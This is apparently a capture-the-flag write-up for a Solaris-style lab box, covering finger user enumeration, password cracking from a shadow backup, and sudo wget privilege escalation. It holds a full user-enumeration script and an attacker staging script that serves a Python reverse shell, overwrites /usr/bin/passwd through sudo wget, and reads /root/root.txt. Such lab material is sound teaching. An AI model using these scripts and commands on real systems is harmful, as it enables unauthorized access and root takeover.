ENUMERATION

Nmap Scan

FINGER ENUMERATION

Finger on its own gave me nothing useful, so I tried brute-forcing usernames against it with pentestmonkey's finger-user-enum script (finger-user-enum-1.0).
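What a finger user-enumeration tool actually does is simple: open TCP/79, send one login name followed by CRLF (RFC 1288), read until the server closes, and classify the reply. The script below is an added example written for this page, not pentestmonkey's code. The finger server it talks to is a constructed stand-in that mimics Solaris fingerd output (Solaris answers unknown logins with "???" in the Name column, Linux fingerd says "no such user"); the account names, the Name strings, the timestamp and the 10.10.14.4 address in the mock replies are all made up for the demo. Against a real target you would call enumerate_users(target_ip, 79, wordlist) directly.

```python
#!/usr/bin/env python3
"""Finger user enumeration over raw TCP/79 (added example; not pentestmonkey's script)."""
import socket
import socketserver
import threading

# Constructed: accounts the mock fingerd below pretends to know. Only for the offline demo.
MOCK_USERS = {"root": "Super-User", "sunny": "sunny", "sammy": "sammy"}


def finger_query(host, port, user, timeout=5.0):
    """Send one RFC 1288 query ("<user>\\r\\n") and return the server's whole reply."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.sendall(user.encode("ascii", "ignore") + b"\r\n")
        chunks = []
        while True:
            data = s.recv(4096)  # fingerd closes the connection when it is done
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode("utf-8", "replace")


def user_exists(reply):
    """Classify a finger reply the way finger-user-enum-style tools do.

    Solaris fingerd answers an unknown login with '???' in the Name column,
    Linux fingerd with 'no such user'. An empty reply is inconclusive (None)."""
    if not reply.strip():
        return None
    if "???" in reply or "no such user" in reply.lower():
        return False
    return True


def enumerate_users(host, port, wordlist):
    """Query each candidate login and return the ones the server confirms."""
    found = []
    for user in wordlist:
        try:
            reply = finger_query(host, port, user)
        except OSError:
            continue  # connection refused / timeout: skip, never count as a hit
        if user_exists(reply):
            found.append(user)
    return found


class MockFingerHandler(socketserver.StreamRequestHandler):
    """Constructed stand-in for a Solaris fingerd so the demo runs offline."""

    HEADER = "Login       Name               TTY         Idle    When    Where\n"

    def handle(self):
        line = self.rfile.readline().decode("ascii", "replace").strip()
        if line.startswith("/W"):  # verbose-mode switch allowed by RFC 1288
            line = line[2:].strip()
        if line in MOCK_USERS:
            body = f"{line:<12}{MOCK_USERS[line]:<19}pts/3              <Apr 24 10:48> 10.10.14.4\n"
        else:
            body = f"{line:<12}???\n"
        self.wfile.write((self.HEADER + body).encode())


def start_mock_server():
    """Bind a mock fingerd on an ephemeral loopback port; returns (server, port)."""
    srv = socketserver.ThreadingTCPServer(("127.0.0.1", 0), MockFingerHandler)
    srv.daemon_threads = True
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv, srv.server_address[1]


def demo(wordlist=("root", "sunny", "sammy", "admin", "guest")):
    """Run the enumerator against the mock server; against a real target call
    enumerate_users(target_ip, 79, wordlist) instead."""
    srv, port = start_mock_server()
    try:
        return enumerate_users("127.0.0.1", port, wordlist)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("valid logins:", demo())
```

The "???" / "no such user" heuristic is the whole trick: fingerd leaks the difference between a known and an unknown login in its reply text, so a wordlist run gives you a confirmed user list before you ever touch SSH.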

SSH ENUMERATION

SSH access was guesswork: trying the box name as the password worked.

USER — SUNNY ENUMERATION

Enumerating sunny's sudo rights, I found we can run a script, /root/troll, as root.

Watching what happens when /root/troll runs, I saw it just prints the user id, nothing much. So I kept enumerating and found a folder named backup containing a backup of /etc/shadow.

Copy both files to your machine (john needs the shadow backup paired with the matching /etc/passwd, via unshadow, before it can crack the hashes) and crack the password with john.

Now that we have sammy's password, let's SSH in as him.

USER — SAMMY ENUMERATION

PRIVILEGE ESCALATION

Checking the sudo rights of user sammy: wget can be run as root.

There is more than one way to abuse wget run through sudo to escalate privileges; I cover two. Let's take them one by one.

1) Using the --input-file (-i) flag

Why not hand wget /root/root.txt as its input file? It treats every line as a URL to fetch and echoes each one back in its error output, so the contents of root.txt land on screen.

2) Overwriting a user binary

What if I told you that calling /usr/bin/passwd would not change a password but instead give you a shell? We are using the trivial approach here: changing what the file does by replacing its contents. We create a malicious payload, a Python reverse shell, and fetch it with wget so that its output is saved to /usr/bin/passwd.

Run passwd and watch the magic on your netcat listener.
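The attacker-side staging for both wget tricks above (the -i file read and the -O overwrite of /usr/bin/passwd), as an added example for this page and not the author's own tooling. It writes the Python reverse shell wget will fetch, serves it over HTTP, and prints the exact commands to type on the target as sammy. The listener address 10.10.14.5, port 4444, HTTP port 8000, the ./www directory and the #!/usr/bin/env python interpreter path are assumptions for the demo; it also assumes sammy may run wget through sudo as root, as found in the sudo check above. Start the netcat listener separately before triggering passwd.

```python
#!/usr/bin/env python3
"""Attacker-side staging for the two sudo-wget tricks (added example, not the author's tooling)."""
import functools
import http.server
import pathlib
import textwrap

# Assumptions for the demo: attacker listener and HTTP port; change to match your setup.
LHOST = "10.10.14.5"
LPORT = 4444
HTTP_PORT = 8000


def reverse_shell_payload(lhost, lport):
    """Python reverse shell that root's wget will write over /usr/bin/passwd.

    The interpreter path is an assumption; point it at whatever python the target has."""
    return textwrap.dedent(f"""\
        #!/usr/bin/env python
        import os, socket, subprocess
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.connect(({lhost!r}, {int(lport)}))
        for fd in (0, 1, 2):          # wire stdin/stdout/stderr to the socket
            os.dup2(s.fileno(), fd)
        subprocess.call(["/bin/sh", "-i"])
        """)


def target_commands(lhost, http_port, payload_name="passwd"):
    """Commands to run on the target as sammy (assumes wget is allowed via sudo)."""
    return [
        # method 1: wget treats every line of the input file as a URL to fetch and
        # echoes it back in its error output, so the flag appears on screen
        "sudo wget -i /root/root.txt",
        # method 2: fetch the payload as root and write it over /usr/bin/passwd (-O)
        f"sudo wget http://{lhost}:{http_port}/{payload_name} -O /usr/bin/passwd",
        # running the replaced binary now connects back to the listener
        "passwd",
    ]


def stage(lhost, lport, directory, payload_name="passwd"):
    """Write the payload into the web root; returns the path of the staged file."""
    root = pathlib.Path(directory)
    root.mkdir(parents=True, exist_ok=True)
    path = root / payload_name
    path.write_text(reverse_shell_payload(lhost, lport))
    return path


def serve(directory, http_port):
    """Serve the staged directory over HTTP (blocks). Run `nc -lvnp LPORT` separately."""
    handler = functools.partial(http.server.SimpleHTTPRequestHandler, directory=str(directory))
    with http.server.ThreadingHTTPServer(("0.0.0.0", http_port), handler) as httpd:
        httpd.serve_forever()


if __name__ == "__main__":
    staged = stage(LHOST, LPORT, "./www")
    print(f"staged {staged}; now run on the target:")
    for cmd in target_commands(LHOST, HTTP_PORT):
        print("  " + cmd)
    serve("./www", HTTP_PORT)
```

Method 1 needs no payload at all, which makes it the quieter of the two: nothing on disk changes. Method 2 replaces a system binary, so on a real engagement keep a copy of the original /usr/bin/passwd and restore it once you have your shell.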

ROOTED!!!!

OSCP | CEH | Cyber Security Enthusiast.